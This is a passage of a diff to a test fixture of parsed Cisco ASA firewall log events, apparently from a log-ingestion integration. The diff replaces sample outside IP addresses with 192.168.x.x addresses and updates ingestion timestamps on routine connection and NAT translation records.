"preserve_original_event" @@ -3638,7 +3638,7 @@ "localhost" ], "ip": [ - "100.66.157.232", + "192.168.157.232", "172.31.98.44" ] }, @@ -3648,8 +3648,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:02.111633784Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11775 for outside:100.66.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 101", + "ingested": "2021-12-09T13:31:36.363452100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11775 for outside:192.168.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 101", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -3686,8 +3686,8 @@ }, "source": { "port": 53, - "address": "100.66.178.133", - "ip": "100.66.178.133" + "address": "192.168.178.133", + "ip": "192.168.178.133" }, "tags": [ "preserve_original_event" @@ -3722,7 +3722,7 @@ "localhost" ], "ip": [ - "100.66.178.133", + "192.168.178.133", "172.31.98.44" ] }, @@ -3732,8 +3732,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:02.111635426Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11776 for outside:100.66.178.133/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 126", + "ingested": "2021-12-09T13:31:36.363457900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11776 for outside:192.168.178.133/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 126", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -3765,8 +3765,8 @@ }, "destination": { "port": 8266, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1453, @@ -3806,7 +3806,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -3814,8 +3814,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111637048Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1453 to outside:100.66.98.44/8266", + "ingested": "2021-12-09T13:31:36.363462700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1453 to outside:192.168.98.44/8266", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -3848,8 +3848,8 @@ }, "source": { "port": 80, - "address": "100.66.133.112", - "ip": "100.66.133.112" + "address": "192.168.133.112", + "ip": "192.168.133.112" }, "tags": [ "preserve_original_event" @@ -3884,7 +3884,7 @@ "localhost" ], "ip": [ - "100.66.133.112", + "192.168.133.112", "172.31.98.44" ] }, @@ -3893,8 +3893,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111638855Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11777 for outside:100.66.133.112/80 (100.66.133.112/80) to inside:172.31.98.44/1453 (172.31.98.44/1453)", + "ingested": "2021-12-09T13:31:36.363466400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11777 for outside:192.168.133.112/80 (192.168.133.112/80) to inside:172.31.98.44/1453 (172.31.98.44/1453)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -3910,7 +3910,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.133.112", + "mapped_source_ip": "192.168.133.112", "connection_id": "11777", "source_interface": "outside", "mapped_destination_port": 1453 @@ -3932,8 +3932,8 @@ }, "source": { "port": 80, - "address": "100.66.133.112", - "ip": "100.66.133.112" + "address": "192.168.133.112", + "ip": "192.168.133.112" }, "tags": [ "preserve_original_event" @@ -3968,7 +3968,7 @@ "localhost" ], "ip": [ - "100.66.133.112", + "192.168.133.112", "172.31.98.44" ] }, @@ -3979,8 +3979,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:02.111640482Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11777 for outside:100.66.133.112/80 to inside:172.31.98.44/1453 duration 0:00:00 bytes 862 TCP FINs", + "ingested": "2021-12-09T13:31:36.363470900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11777 for outside:192.168.133.112/80 to inside:172.31.98.44/1453 duration 0:00:00 bytes 862 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -4017,8 +4017,8 @@ }, "source": { "port": 53, - "address": "100.66.204.197", - "ip": "100.66.204.197" + "address": "192.168.204.197", + "ip": "192.168.204.197" }, "tags": [ "preserve_original_event" @@ -4053,7 +4053,7 @@ "localhost" ], "ip": [ - "100.66.204.197", + "192.168.204.197", "172.31.98.44" ] }, @@ -4062,8 +4062,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111642139Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11779 for outside:100.66.204.197/53 (100.66.204.197/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:31:36.363476700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11779 for outside:192.168.204.197/53 (192.168.204.197/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -4079,7 +4079,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.204.197", + "mapped_source_ip": "192.168.204.197", "connection_id": "11779", "source_interface": "outside", "mapped_destination_port": 56132 @@ -4101,8 +4101,8 @@ }, "source": { "port": 53, - "address": "100.66.157.232", - "ip": "100.66.157.232" + "address": "192.168.157.232", + "ip": "192.168.157.232" }, "tags": [ "preserve_original_event" @@ -4137,7 +4137,7 @@ "localhost" ], "ip": [ - "100.66.157.232", + "192.168.157.232", "172.31.98.44" ] }, @@ -4147,8 +4147,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:02.111643791Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11778 for outside:100.66.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", + "ingested": "2021-12-09T13:31:36.363481500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11778 for outside:192.168.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -4185,8 +4185,8 @@ }, "source": { "port": 53, - "address": "100.66.204.197", - "ip": "100.66.204.197" + "address": "192.168.204.197", + "ip": "192.168.204.197" }, "tags": [ "preserve_original_event" @@ -4221,7 +4221,7 @@ "localhost" ], "ip": [ - "100.66.204.197", + "192.168.204.197", "172.31.98.44" ] }, @@ -4231,8 +4231,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:02.111645590Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11779 for outside:100.66.204.197/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 176", + "ingested": "2021-12-09T13:31:36.363486Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11779 for outside:192.168.204.197/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 176", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -4264,8 +4264,8 @@ }, "destination": { "port": 8267, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1454, @@ -4305,7 +4305,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -4313,8 +4313,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111647250Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1454 to outside:100.66.98.44/8267", + "ingested": "2021-12-09T13:31:36.363490600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1454 to outside:192.168.98.44/8267", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -4347,8 +4347,8 @@ }, "source": { "port": 80, - "address": "100.66.128.3", - "ip": "100.66.128.3" + "address": "192.168.128.3", + "ip": "192.168.128.3" }, "tags": [ "preserve_original_event" @@ -4383,7 +4383,7 @@ "localhost" ], "ip": [ - "100.66.128.3", + "192.168.128.3", "172.31.98.44" ] }, @@ -4392,8 +4392,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111648940Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11780 for outside:100.66.128.3/80 (100.66.128.3/80) to inside:172.31.98.44/1454 (172.31.98.44/1454)", + "ingested": "2021-12-09T13:31:36.363496500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11780 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1454 (172.31.98.44/1454)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -4409,7 +4409,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.128.3", + "mapped_source_ip": "192.168.128.3", "connection_id": "11780", "source_interface": "outside", "mapped_destination_port": 1454 @@ -4426,8 +4426,8 @@ }, "destination": { "port": 8268, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1455, @@ -4467,7 +4467,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -4475,8 +4475,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111650692Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1455 to outside:100.66.98.44/8268", + "ingested": "2021-12-09T13:31:36.363502300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1455 to outside:192.168.98.44/8268", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -4509,8 +4509,8 @@ }, "source": { "port": 80, - "address": "100.66.128.3", - "ip": "100.66.128.3" + "address": "192.168.128.3", + "ip": "192.168.128.3" }, "tags": [ "preserve_original_event" @@ -4545,7 +4545,7 @@ "localhost" ], "ip": [ - "100.66.128.3", + "192.168.128.3", "172.31.98.44" ] }, @@ -4554,8 +4554,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111652434Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11781 for outside:100.66.128.3/80 (100.66.128.3/80) to inside:172.31.98.44/1455 (172.31.98.44/1455)", + "ingested": "2021-12-09T13:31:36.363524200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11781 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1455 (172.31.98.44/1455)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -4571,7 +4571,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.128.3", + "mapped_source_ip": "192.168.128.3", "connection_id": "11781", "source_interface": "outside", "mapped_destination_port": 1455 @@ -4588,8 +4588,8 @@ }, "destination": { "port": 8269, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1456, @@ -4629,7 +4629,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -4637,8 +4637,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111654088Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1456 to outside:100.66.98.44/8269", + "ingested": "2021-12-09T13:31:36.363529500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1456 to outside:192.168.98.44/8269", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -4671,8 +4671,8 @@ }, "source": { "port": 80, - "address": "100.66.128.3", - "ip": "100.66.128.3" + "address": "192.168.128.3", + "ip": "192.168.128.3" }, "tags": [ "preserve_original_event" @@ -4707,7 +4707,7 @@ "localhost" ], "ip": [ - "100.66.128.3", + "192.168.128.3", "172.31.98.44" ] }, @@ -4716,8 +4716,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111655742Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11782 for outside:100.66.128.3/80 (100.66.128.3/80) to inside:172.31.98.44/1456 (172.31.98.44/1456)", + "ingested": "2021-12-09T13:31:36.363534100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11782 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1456 (172.31.98.44/1456)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -4733,7 +4733,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.128.3", + "mapped_source_ip": "192.168.128.3", "connection_id": "11782", "source_interface": "outside", "mapped_destination_port": 1456 @@ -4755,8 +4755,8 @@ }, "source": { "port": 53, - "address": "100.66.100.4", - "ip": "100.66.100.4" + "address": "192.168.100.4", + "ip": "192.168.100.4" }, "tags": [ "preserve_original_event" @@ -4791,7 +4791,7 @@ "localhost" ], "ip": [ - "100.66.100.4", + "192.168.100.4", "172.31.98.44" ] }, @@ -4800,8 +4800,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111657481Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11783 for outside:100.66.100.4/53 (100.66.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:31:36.363539300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11783 for outside:192.168.100.4/53 (192.168.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -4817,7 +4817,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.100.4", + "mapped_source_ip": "192.168.100.4", "connection_id": "11783", "source_interface": "outside", "mapped_destination_port": 56132 @@ -4839,8 +4839,8 @@ }, "source": { "port": 53, - "address": "100.66.100.4", - "ip": "100.66.100.4" + "address": "192.168.100.4", + "ip": "192.168.100.4" }, "tags": [ "preserve_original_event" @@ -4875,7 +4875,7 @@ "localhost" ], "ip": [ - "100.66.100.4", + "192.168.100.4", "172.31.98.44" ] }, @@ -4885,8 +4885,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:02.111659156Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11783 for outside:100.66.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", + "ingested": "2021-12-09T13:31:36.363544500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11783 for outside:192.168.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -4918,8 +4918,8 @@ }, "destination": { "port": 8270, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1457, @@ -4959,7 +4959,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -4967,8 +4967,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111660818Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1457 to outside:100.66.98.44/8270", + "ingested": "2021-12-09T13:31:36.363548400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1457 to outside:192.168.98.44/8270", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -5001,8 +5001,8 @@ }, "source": { "port": 80, - "address": "100.66.198.40", - "ip": "100.66.198.40" + "address": "192.168.198.40", + "ip": "192.168.198.40" }, "tags": [ "preserve_original_event" @@ -5037,7 +5037,7 @@ "localhost" ], "ip": [ - "100.66.198.40", + "192.168.198.40", "172.31.98.44" ] }, @@ -5046,8 +5046,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111662474Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11784 for outside:100.66.198.40/80 (100.66.198.40/80) to inside:172.31.98.44/1457 (172.31.98.44/1457)", + "ingested": "2021-12-09T13:31:36.363553Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11784 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1457 (172.31.98.44/1457)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -5063,7 +5063,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.198.40", + "mapped_source_ip": "192.168.198.40", "connection_id": "11784", "source_interface": "outside", "mapped_destination_port": 1457 @@ -5080,8 +5080,8 @@ }, "destination": { "port": 8271, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1458, @@ -5121,7 +5121,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -5129,8 +5129,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111664116Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1458 to outside:100.66.98.44/8271", + "ingested": "2021-12-09T13:31:36.363558700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1458 to outside:192.168.98.44/8271", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -5163,8 +5163,8 @@ }, "source": { "port": 80, - "address": "100.66.198.40", - "ip": "100.66.198.40" + "address": "192.168.198.40", + "ip": "192.168.198.40" }, "tags": [ "preserve_original_event" @@ -5199,7 +5199,7 @@ "localhost" ], "ip": [ - "100.66.198.40", + "192.168.198.40", "172.31.98.44" ] }, @@ -5208,8 +5208,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111665819Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11785 for outside:100.66.198.40/80 (100.66.198.40/80) to inside:172.31.98.44/1458 (172.31.98.44/1458)", + "ingested": "2021-12-09T13:31:36.363562600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11785 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1458 (172.31.98.44/1458)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -5225,7 +5225,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.198.40", + "mapped_source_ip": "192.168.198.40", "connection_id": "11785", "source_interface": "outside", "mapped_destination_port": 1458 @@ -5247,8 +5247,8 @@ }, "source": { "port": 53, - "address": "100.66.1.107", - "ip": "100.66.1.107" + "address": "192.168.1.107", + "ip": "192.168.1.107" }, "tags": [ "preserve_original_event" @@ -5283,7 +5283,7 @@ "localhost" ], "ip": [ - "100.66.1.107", + "192.168.1.107", "172.31.98.44" ] }, @@ -5292,8 +5292,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111667537Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11786 for outside:100.66.1.107/53 (100.66.1.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:31:36.363567600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11786 for outside:192.168.1.107/53 (192.168.1.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -5309,7 +5309,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.1.107", + "mapped_source_ip": "192.168.1.107", "connection_id": "11786", "source_interface": "outside", "mapped_destination_port": 56132 @@ -5331,8 +5331,8 @@ }, "source": { "port": 80, - "address": "100.66.198.40", - "ip": "100.66.198.40" + "address": "192.168.198.40", + "ip": "192.168.198.40" }, "tags": [ "preserve_original_event" @@ -5367,7 +5367,7 @@ "localhost" ], "ip": [ - "100.66.198.40", + "192.168.198.40", "172.31.98.44" ] }, @@ -5378,8 +5378,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:02.111669206Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11784 for outside:100.66.198.40/80 to inside:172.31.98.44/1457 duration 0:00:00 bytes 593 TCP FINs", + "ingested": "2021-12-09T13:31:36.363571800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11784 for outside:192.168.198.40/80 to inside:172.31.98.44/1457 duration 0:00:00 bytes 593 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -5411,8 +5411,8 @@ }, "destination": { "port": 8272, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1459, @@ -5452,7 +5452,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -5460,8 +5460,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111670851Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1459 to outside:100.66.98.44/8272", + "ingested": "2021-12-09T13:31:36.363576300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1459 to outside:192.168.98.44/8272", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -5494,8 +5494,8 @@ }, "source": { "port": 80, - "address": "100.66.198.40", - "ip": "100.66.198.40" + "address": "192.168.198.40", + "ip": "192.168.198.40" }, "tags": [ "preserve_original_event" @@ -5530,7 +5530,7 @@ "localhost" ], "ip": [ - "100.66.198.40", + "192.168.198.40", "172.31.98.44" ] }, @@ -5539,8 +5539,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111672537Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11787 for outside:100.66.198.40/80 (100.66.198.40/80) to inside:172.31.98.44/1459 (172.31.98.44/1459)", + "ingested": "2021-12-09T13:31:36.363580400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11787 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1459 (172.31.98.44/1459)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -5556,7 +5556,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.198.40", + "mapped_source_ip": "192.168.198.40", "connection_id": "11787", "source_interface": "outside", "mapped_destination_port": 1459 @@ -5578,8 +5578,8 @@ }, "source": { "port": 53, - "address": "100.66.1.107", - "ip": "100.66.1.107" + "address": "192.168.1.107", + "ip": "192.168.1.107" }, "tags": [ "preserve_original_event" @@ -5614,7 +5614,7 @@ "localhost" ], "ip": [ - "100.66.1.107", + "192.168.1.107", "172.31.98.44" ] }, @@ -5624,8 +5624,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:02.111674159Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11786 for outside:100.66.1.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 375", + "ingested": "2021-12-09T13:31:36.363585300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11786 for outside:192.168.1.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 375", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -5657,8 +5657,8 @@ }, "destination": { "port": 8273, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1460, @@ -5698,7 +5698,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -5706,8 +5706,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111675872Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1460 to outside:100.66.98.44/8273", + "ingested": "2021-12-09T13:31:36.363590500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1460 to outside:192.168.98.44/8273", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -5740,8 +5740,8 @@ }, "source": { "port": 80, - "address": "100.66.192.44", - "ip": "100.66.192.44" + "address": "192.168.192.44", + "ip": "192.168.192.44" }, "tags": [ "preserve_original_event" @@ -5776,7 +5776,7 @@ "localhost" ], "ip": [ - "100.66.192.44", + "192.168.192.44", "172.31.98.44" ] }, @@ -5785,8 +5785,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111677512Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11788 for outside:100.66.192.44/80 (100.66.192.44/80) to inside:172.31.98.44/1460 (172.31.98.44/1460)", + "ingested": "2021-12-09T13:31:36.363596800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11788 for outside:192.168.192.44/80 (192.168.192.44/80) to inside:172.31.98.44/1460 (172.31.98.44/1460)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -5802,7 +5802,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.192.44", + "mapped_source_ip": "192.168.192.44", "connection_id": "11788", "source_interface": "outside", "mapped_destination_port": 1460 @@ -5840,8 +5840,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111679154Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1454 to outside:100.66.98.44/8267 duration 0:00:30", + "ingested": "2021-12-09T13:31:36.363601500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1454 to outside:192.168.98.44/8267 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -5866,8 +5866,8 @@ }, "destination": { "port": 8277, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1385, @@ -5907,7 +5907,7 @@ ], "ip": [ "172.31.156.80", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -5915,8 +5915,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111680802Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1385 to outside:100.66.98.44/8277", + "ingested": "2021-12-09T13:31:36.363606100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1385 to outside:192.168.98.44/8277", "code": "305011", "kind": "event", "action": 